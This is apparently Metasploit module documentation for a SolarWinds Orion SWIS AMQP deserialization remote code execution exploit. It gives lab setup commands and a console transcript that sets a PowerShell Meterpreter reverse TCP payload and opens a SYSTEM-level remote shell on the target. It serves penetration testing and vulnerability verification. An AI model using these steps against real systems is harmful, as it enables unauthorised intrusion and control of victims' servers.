## Vulnerable Application

The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the
AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted
message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.

## Verification Steps

1. Install the application (tested SolarWindows Orion NPM versions 2020.2.5 and 2020.2.6)
   1. After installation is complete, create an AMQP account so you know the credentials. The default account is `orion`.
   2. Open a command prompt in `C:\Program Files (x86)\SolarWinds\Orion\RabbitMQ\sbin>`
   3. Run: `.\rabbitmqctl.bat add_user "hax" "Password1!"`
   4. Run: `.\rabbitmqctl.bat set_permissions hax .* .* .*`
   5. Run: `.\rabbitmqctl.bat set_user_tags hax administrator`
2. Start msfconsole
3. Do: `use exploit/windows/misc/solarwinds_amqp_deserialization`
4. Set the `RHOSTS`, `USERNAME`, `PASSWORD`, `PAYLOAD` and payload related-options
5. Do: `run`
6. You should get a shell.

## Options

## Scenarios

### SolarWinds Orion NPM 2020.2.6 on Windows Server 2019 x64

```
msf6 > use exploit/windows/misc/solarwinds_amqp_deserialization 
[*] Using configured payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set RHOSTS 192.168.159.17
RHOSTS => 192.168.159.17
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set USERNAME hax
USERNAME => hax
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/misc/solarwinds_amqp_deserialization) > run

[*] Powershell command length: 4175
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.17:5671 - Successfully connected to the remote server.
[*] 192.168.159.17:5671 - Successfully opened a new channel.
[*] 192.168.159.17:5671 - Successfully published the message to the channel.
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.17:54960) at 2023-03-17 13:20:03 -0400

meterpreter >
```
